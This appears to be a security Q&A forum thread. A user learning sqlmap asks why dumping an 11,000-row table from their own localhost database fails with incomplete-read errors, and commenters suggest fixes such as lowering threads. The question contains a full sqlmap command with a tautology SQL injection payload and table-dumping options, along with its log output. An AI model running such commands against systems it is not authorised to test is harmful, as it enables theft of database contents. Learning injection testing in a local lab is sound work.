1

I am learning/working on sqlmap and I was trying to dump a large table with 11K entries on my localhost.

The command I used is:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

It is supposed to dump the types table from the Animal database.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

I tried lowering the threads but all in vain. What should I do in a scenario where the table size is large?

  • this is a stab in the dark but have you tried 127.0.01 instead? have you setup local domains? – chriz May 9 '16 at 13:45
  • "incomplete read" would appear to mean that the connection was closed before all the threads had completed. Have you lowered the threads to 1? – schroeder May 9 '16 at 15:26
  • @chriz yes i did – Johnny May 10 '16 at 4:44
  • @schroeder I tried the lowest level that is 1 :) even tried adding delay between requests that is --delay – Johnny May 10 '16 at 4:58

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy

Browse other questions tagged or ask your own question.